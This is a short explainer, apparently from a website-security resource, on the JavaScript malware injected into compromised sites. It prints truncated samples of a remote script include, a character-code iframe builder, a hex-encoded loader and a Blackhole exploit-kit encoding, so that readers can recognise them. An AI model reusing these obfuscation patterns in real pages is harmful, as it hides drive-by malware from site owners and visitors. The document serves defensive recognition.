JavaScript is a language (code) that can be executed directly by the browser and many other applications that support it (PDF, email readers, etc).

Javascript malware

Because it is a full programming language executed by the browser, attackers use it heavily to run malicious code from the compromised sites. It can range from simple remote source includes, to heavily obfuscated payloads to redirect users to spam, exploit kits (drive by downloads), fake AV and anything else you can imagine.

Simple remote includes

This code loads whatever content is inside and is executed by the browser of the victim.

<script type="text/javascript" src=""...

Encoded JavaScript

There are so many variations, ranging from an iframe builder hidden like this:

s  =  String[c+'r'+"omChar"+'C'+'o'+"d'+'e'] (70, 81,69,87 ,79,71,80,86,16,89,84,75,86,  71,10,9,30,69,71,80,86,71,84,32,30,74,19,32,50

To a remote code included hidden in hexadecimal:

var _0x4470=["\x39\ x3D\x31\x2E\x64\ x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39..

Or to a more complex blackhole exploit kit enconding type:

<script>i=0;  try{prototype;}catch(z){h="harCode" ;f=["-33c-33c63c60c- 10c-2c58c69c5 7c75c67c59c68c7